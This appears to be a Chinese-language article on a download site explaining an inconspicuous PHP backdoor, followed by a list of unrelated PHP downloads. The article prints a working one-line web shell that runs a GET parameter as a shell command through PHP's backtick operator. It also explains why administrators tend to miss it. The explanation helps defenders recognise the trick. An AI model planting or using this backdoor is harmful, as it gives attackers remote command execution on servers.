一个不易被发现的PHP后门代码解析
偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。 伪装性很好,很容易被管理员忽略。 $selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; } 刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 而且又不是单引号,这个就是关键所在了,这个符号是 Esc 下面的一个键(位于感叹号!旁边的), 通过 echo `系统命令`; 可以
用户评论
推荐下载
-
PHP开发一个完整的网站
告诉您用PHP开发网站需要学习哪些知识,教您如何用PHP开发一个完整的网站。
21 2020-05-15 -
VicWord一个纯php的分词
含有3种切分方法getWord长度优先切分。最快getShortWord细粒度切分。比最快慢一点点getAutoWord自动切分(在相邻词做了递归)。效果最好可自定义词典,自己添加词语到词库,
32 2020-06-15 -
一个简单的聊天程序php
一个简单的PHP聊天程序,对于新手来说,是不可多得的资料.
21 2020-06-10 -
php的一个分页类.zip
php的一个分页类
40 2019-09-21 -
PHP的一个超强分页类
php的分页类,简单易懂,注释里附带例子
29 2019-09-21 -
PHPBB一个很好的php论坛
一个很好的php论坛程序!
19 2019-09-02 -
一个好用的php分页类
核心思想是在网上看到的,做了些开改正及补充,用起来还不错
25 2019-09-14 -
初学php的一个小项目
初学php的一个小项目,仅仅是为了了解php函数的应用....
28 2019-01-15 -
一个ioncube加密的PHP文件
一个经ioncube加密的PHP文件,直接将后缀名txt改为php即可
46 2019-01-20 -
Fetch一个PHP的IMAP库
Fetch:一个PHP的IMAP库,用于读取邮件和附件
7 2020-08-22
暂无评论